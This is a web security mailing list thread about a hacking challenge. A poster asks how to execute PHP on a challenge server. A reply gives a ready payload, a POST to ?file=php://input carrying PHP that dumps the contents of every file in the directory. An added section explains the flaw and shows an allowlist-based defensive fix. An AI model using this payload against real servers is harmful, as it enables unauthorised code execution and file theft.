Hello. I was told you guys might be able to help me out. I've been dared to complete this challenge and execute remote code on a server, but I'm stuck.
Basically, here's what I know:
In case you're wondering, this is not for malicious purposes, I'm simply learning by completing one of the challenges here:
http://tasteless.phpnet.us/level_3.php
I've been googling for hours but I'm completely stuck. The author told me I'm not allowed to use LFI nor RFI, I simply need to provide some php code with a GET or POST request and get it executed. I tried file=php://input along with <?php phpinfo(); ?> in a POST request done via a web proxy, and it worked when I removed the part of the script that appends .html to the string. I'm not sure how to remotely disable the part that appends .html, so that's basically what I'm looking for. %00 is blocked (I think? It's not working). Other than that, I'm looking for any other possible solutions to the problem as well, not just this php://input solution.
I was hoping you guys would like a challenge ;-)
Thanks for your time,
Cris
HTTP POST to http://level3.tasteless.eu/?file=php://input
executing:
<?$d=dir(getcwd());echo"<pre>path:".$d->path.PHP_EOL;while(($file=$d->read())!==false){echo"filename:".$file.PHP_EOL.file_get_contents($file).PHP_EOL;}echo"</pre>";$d->close();?>
Cris Noob <cloakbot <at> hotmail.com> writes:
Hello. I was told you guys might be able to help me out. I've been dared
to complete this challenge and execute remote code on a server, but I'm
stuck.
Basically, here's what I know: http://pastebin.com/p89CGcrh
In case you're wondering, this is not for malicious purposes, I'm simply
learning by completing one of the challenges here:
http://tasteless.phpnet.us/level_3.php
I've been googling for hours but I'm completely stuck. The author told me
I'm not allowed to use LFI nor RFI, I simply need to provide some php code
with a GET or POST request and get it executed. I tried file=php://input
along with <?php phpinfo(); ?> in a POST request done via a web proxy, and
it worked when I removed the part of the script that appends .html to the
string. I'm not sure how to remotely disable the part that appends .html,
so that's basically what I'm looking for. %00 is blocked (I think? It's not
working). Other than that, I'm looking for any other possible solutions to
the problem as well, not just this php://input solution.
I was hoping you guys would like a challenge
Thanks for your time,
Cris
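Added example (not part of the original thread, and not the challenge's code): the request in the reply above works because the script hands the `file` parameter to an include. A defensive counterpart in PHP resolves the parameter against fixed names and reads the file instead of including it; the allowlist, directory layout and function names are hypothetical.

```php
<?php
// Added example, not the challenge's code. Pattern assumed from the thread:
//   include($_GET['file'] . '.html');
// include() accepts stream wrappers, so php://input makes PHP execute the
// request body when allow_url_include is enabled.

const ALLOWED_PAGES = ['home', 'about'];   // hypothetical allowlist

// Map the request parameter to a file under $baseDir, or null if refused.
function resolve_page(string $requested, string $baseDir): ?string
{
    // Exact match only: wrappers (php://, data://), "../" and NUL bytes
    // can never equal an allowlisted name.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.html');
    if ($base === false || $path === false) {
        return null;   // directory or page file does not exist
    }
    // Symlink defence: the resolved file must still sit inside $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Serve static content by reading it; nothing in it is parsed as PHP.
function render_page(string $requested, string $baseDir): string
{
    $path = resolve_page($requested, $baseDir);
    return $path === null ? 'Not found' : file_get_contents($path);
}

// Constructed demo: a temporary page directory and sample parameter values.
$dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.html', '<h1>home</h1>');
foreach (['home', 'php://input', '../../etc/passwd', "home\0", 'about'] as $in) {
    $verdict = resolve_page($in, $dir) === null ? 'refused' : 'served';
    printf("%-22s %s\n", json_encode($in), $verdict);
}
unlink($dir . '/home.html');
rmdir($dir);
```

Keeping `allow_url_include` at its default of Off in php.ini is a second layer: with it disabled, include() refuses php://input even if a dynamic include slips through review.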
The Web Security Mailing List